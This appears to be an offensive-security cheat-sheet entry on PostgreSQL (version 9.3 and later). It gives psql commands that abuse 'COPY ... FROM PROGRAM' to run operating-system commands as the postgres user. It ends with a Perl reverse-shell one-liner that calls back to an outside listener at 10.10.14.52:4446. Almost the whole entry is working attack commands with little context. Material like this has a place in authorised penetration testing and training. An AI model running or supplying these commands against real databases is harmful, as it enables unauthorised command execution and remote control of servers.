Database Services

PostgreSQL

Local Privilege Escalation >= v9.3

  • Execute OS commands as postgresql user.

psql -U postgres
\c postgres
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;

#Reverse shell. Set up a listener before execution.
COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.52:4446");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

Last updated